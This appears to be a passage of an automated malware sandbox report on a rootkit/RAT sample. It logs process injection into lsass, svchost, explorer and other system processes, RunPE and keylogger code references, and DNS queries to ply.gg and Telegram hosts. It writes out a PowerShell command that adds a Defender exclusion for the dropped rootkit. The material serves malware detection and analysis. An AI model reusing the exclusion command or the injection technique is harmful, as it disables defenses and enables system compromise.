Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00000202C0AE8518
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000002A66130B62C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A661308518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_000002A661308518
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A6613081B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000002A6613081B0
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF2181B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000002BAAF2181B0
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000002BAAF21B62C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF218518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_000002BAAF218518
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879C8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_0000026A879C8518
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0000026A879CB62C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879C81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0000026A879C81B0
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537A81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00000179537A81B0
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537AB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00000179537AB62C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537A8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00000179537A8518
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002295D56B62C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D568518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002295D568518
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D5681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002295D5681B0
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe Domain query: updates-full.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: subscribe-bond.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: api.telegram.org
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.0.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.2.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 4.2.powershell.exe.11113b8b798.11.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: DeadXClient.exe.0.dr, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: DeadROOTkit.exe.0.dr, XLogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002430 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 6_2_0000000140002430
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF1E2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F72AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C0262AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C9F32AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 645B2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4F62AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B942AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66932AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78742AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DB2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C5AA2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F8FD2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F33D2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 48772AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2FB21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EAD62AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86DD2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4DB12AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F952AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10C21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10C21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DC21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EC21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13E21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E221CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15B21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B621CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13121CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F421CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C221CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A421CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13821CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14C21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B421CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5121CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E321CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10B21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B921CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F121CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13921CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B021CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14721CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9121CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7921CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C521CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12121CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B21CF
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B412AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 38862AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\conhost.exe EIP: 2F792AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Users\Public\Deadsvchost.exe EIP: 21B42AB8
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\schtasks.exe EIP: 3BB52AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E00B2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 562AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11C2AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CEF02AB8
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CEF62AB8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8BA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A Jump to behavior
